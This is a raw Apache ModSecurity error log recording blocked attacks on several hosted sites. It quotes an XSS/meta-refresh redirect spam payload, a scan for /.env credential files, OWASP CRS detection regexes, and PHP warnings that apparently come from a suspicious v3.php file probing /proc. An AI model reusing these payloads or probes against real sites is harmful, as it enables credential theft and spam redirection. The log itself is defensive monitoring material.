"OWASP_AppSensor/IE1"] [ta [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBvaFW67LJTsgN3jQUhQAAABc"]
[Mon May 11 22:53:18.003058 2026] [security2:error] [pid 1588898:tid 1588921] [client 194.233.64.127:60705] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Is.gd/tech_salaries_45076 /> found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Is.gd/tech_salaries_45076>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Is.gd/tech_salaries_45076 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_A [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBvaFW67LJTsgN3jQUhQAAABc"]
[Mon May 11 22:53:18.003200 2026] [security2:error] [pid 1588898:tid 1588921] [client 194.233.64.127:60705] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Is.gd/tech_salaries_45076>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Is.gd/tech_salaries_45076 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBvaFW67LJTsgN3jQUhQAAABc"]
[Mon May 11 22:53:18.003391 2026] [security2:error] [pid 1588898:tid 1588921] [client 194.233.64.127:60705] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Is.gd/tech_salaries_45076>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Is.gd/tech_salaries_45076 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBvaFW67LJTsgN3jQUhQAAABc"]
[Mon May 11 22:53:18.003789 2026] [security2:error] [pid 1588898:tid 1588921] [client 194.233.64.127:60705] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBvaFW67LJTsgN3jQUhQAAABc"]
[Mon May 11 22:53:18.004056 2026] [security2:error] [pid 1588898:tid 1588921] [client 194.233.64.127:60705] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBvaFW67LJTsgN3jQUhQAAABc"]
[Mon May 11 22:54:01.366949 2026] [security2:error] [pid 1588898:tid 1589210] [client 176.65.139.239:54016] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "com.manhattan-studio.fr"] [uri "/app/.env"] [unique_id "agJB6aFW67LJTsgN3jQUwwAAABU"]
[Mon May 11 22:54:01.367122 2026] [security2:error] [pid 1588898:tid 1589210] [client 176.65.139.239:54016] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "com.manhattan-studio.fr"] [uri "/app/.env"] [unique_id "agJB6aFW67LJTsgN3jQUwwAAABU"]
[Mon May 11 22:54:01.367344 2026] [security2:error] [pid 1588898:tid 1589210] [client 176.65.139.239:54016] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "com.manhattan-studio.fr"] [uri "/app/.env"] [unique_id "agJB6aFW67LJTsgN3jQUwwAAABU"]
[Mon May 11 22:54:01.851938 2026] [security2:error] [pid 1601130:tid 1601167] [client 129.226.94.18:42298] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/acquisition/"] [unique_id "agJB6XEgAO_835W6c1mffQAAAFE"]
PHP Warning:  filesize(): stat failed for /proc/69/task/69/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/69/task/69/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/69/task/69/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/69/task/69/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/69/task/69/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/69/task/69/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 22:54:16.226197 2026] [security2:error] [pid 1606352:tid 1606419] [client 43.159.140.236:42734] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agJB-Ho_DFxNSZVmaX3Z7gAAAMA"]
[Mon May 11 22:55:10.546379 2026] [security2:error] [pid 1588898:tid 1588910] [client 43.167.232.38:52248] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJCLqFW67LJTsgN3jQVBgAAAAs"]
PHP Warning:  filesize(): stat failed for /proc/968/task/969/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/968/task/969/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/968/task/969/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/968/task/969/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/968/task/969/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/968/task/969/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 22:55:45.772744 2026] [security2:error] [pid 1606352:tid 1606439] [client 49.51.132.100:54344] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.krakoukas.com"] [uri "/"] [unique_id "agJCUXo_DFxNSZVmaX3aVgAAANQ"], referer: http://www.krakoukas.com
[Mon May 11 22:55:49.713116 2026] [security2:error] [pid 1606352:tid 1606431] [client 49.51.132.100:33108] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/"] [unique_id "agJCVXo_DFxNSZVmaX3aWAAAAMw"], referer: https://www.krakoukas.com/
[Mon May 11 22:55:54.155558 2026] [security2:error] [pid 1605480:tid 1605526] [client 43.164.0.96:58828] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/nos-bieres/"] [unique_id "agJCWh2Cvzd_nyNfUm8JIgAAAQQ"]
[Mon May 11 22:55:58.528615 2026] [security2:error] [pid 1630927:tid 1630938] [client 208.84.100.152:43056] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.piregwan-genesis.com"] [uri "/.env"] [unique_id "agJCXmiGYYhUwDaJINmW3wAAAUg"]
[Mon May 11 22:55:58.529025 2026] [security2:error] [pid 1630927:tid 1630938] [client 208.84.100.152:43056] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.piregwan-genesis.com"] [uri "/.env"] [unique_id "agJCXmiGYYhUwDaJINmW3wAAAUg"]
[Mon May 11 22:55:58.529260 2026] [security2:error] [pid 1630927:tid 1630938] [client 208.84.100.152:43056] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.piregwan-genesis.com"] [uri "/.env"] [unique_id "agJCXmiGYYhUwDaJINmW3wAAAUg"]
[Mon May 11 22:55:58.613755 2026] [security2:error] [pid 1630927:tid 1630934] [client 208.84.100.152:43076] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.piregwan-genesis.com"] [uri "/.env.local"] [unique_id "agJCXmiGYYhUwDaJINmW4AAAAUQ"]
[Mon May 11 22:55:58.613907 2026] [security2:error] [pid 1630927:tid 1630934] [client 208.84.100.152:43076] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.piregwan-genesis.com"] [uri "/.env.local"] [unique_id "agJCXmiGYYhUwDaJINmW4AAAAUQ"]
[Mon May 11 22:55:58.614111 2026] [security2:error] [pid 1630927:tid 1630934] [client 208.84.100.152:43076] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.piregwan-genesis.com"] [uri "/.env.local"] [unique_id "agJCXmiGYYhUwDaJINmW4AAAAUQ"]
[Mon May 11 22:55:58.614305 2026] [security2:error] [pid 1590352:tid 1590393] [client 208.84.100.152:43088] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.piregwan-genesis.com"] [uri "/app/.env"] [unique_id "agJCXq1q0G_aXAqWauQEngAAAIE"]
[Mon May 11 22:55:58.614522 2026] [security2:error] [pid 1590352:tid 1590393] [client 208.84.100.152:43088] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.piregwan-genesis.com"] [uri "/app/.env"] [unique_id "agJCXq1q0G_aXAqWauQEngAAAIE"]
[Mon May 11 22:55:58.614775 2026] [security2:error] [pid 1590352:tid 1590393] [client 208.84.100.152:43088] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.piregwan-genesis.com"] [uri "/app/.env"] [unique_id "agJCXq1q0G_aXAqWauQEngAAAIE"]
[Mon May 11 22:55:58.617525 2026] [security2:error] [pid 1605480:tid 1605545] [client 208.84.100.152:43102] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.piregwan-genesis.com"] [uri "/.env.production"] [unique_id "agJCXh2Cvzd_nyNfUm8JMwAAARc"]
[Mon May 11 22:55:58.617600 2026] [security2:error] [pid 1588898:tid 1588901] [client 208.84.100.152:43112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.piregwan-genesis.com"] [uri "/api/.env"] [unique_id "agJCXqFW67LJTsgN3jQVjAAAAAI"]
[Mon May 11 22:55:58.617652 2026] [security2:error] [pid 1606352:tid 1606428] [client 208.84.100.152:43126] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.piregwan-genesis.com"] [uri "/backend/.env"] [unique_id "agJCXno_DFxNSZVmaX3abQAAAMk"]
[Mon May 11 22:55:58.617756 2026] [security2:error] [pid 1588898:tid 1588901] [client 208.84.100.152:43112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.piregwan-genesis.com"] [uri "/api/.env"] [unique_id "agJCXqFW67LJTsgN3jQVjAAAAAI"]
[Mon May 11 22:55:58.617764 2026] [security2:error] [pid 1605480:tid 1605545] [client 208.84.100.152:43102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.piregwan-genesis.com"] [uri "/.env.production"] [unique_id "agJCXh2Cvzd_nyNfUm8JMwAAARc"]
[Mon May 11 22:55:58.617796 2026] [security2:error] [pid 1606352:tid 1606428] [client 208.84.100.152:43126] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.piregwan-genesis.com"] [uri "/backend/.env"] [unique_id "agJCXno_DFxNSZVmaX3abQAAAMk"]
[Mon May 11 22:55:58.617998 2026] [security2:error] [pid 1606352:tid 1606428] [client 208.84.100.152:43126] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.piregwan-genesis.com"] [uri "/backend/.env"] [unique_id "agJCXno_DFxNSZVmaX3abQAAAMk"]
[Mon May 11 22:55:58.618215 2026] [security2:error] [pid 1605480:tid 1605545] [client 208.84.100.152:43102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.piregwan-genesis.com"] [uri "/.env.production"] [unique_id "agJCXh2Cvzd_nyNfUm8JMwAAARc"]
[Mon May 11 22:55:58.618364 2026] [security2:error] [pid 1588898:tid 1588901] [client 208.84.100.152:43112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.piregwan-genesis.com"] [uri "/api/.env"] [unique_id "agJCXqFW67LJTsgN3jQVjAAAAAI"]
[Mon May 11 22:55:59.784806 2026] [security2:error] [pid 1590352:tid 1590416] [client 43.164.0.96:43082] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/nos-bieres/"] [unique_id "agJCX61q0G_aXAqWauQEogAAAJg"], referer: http://www.labaujue.com/nos-bieres//
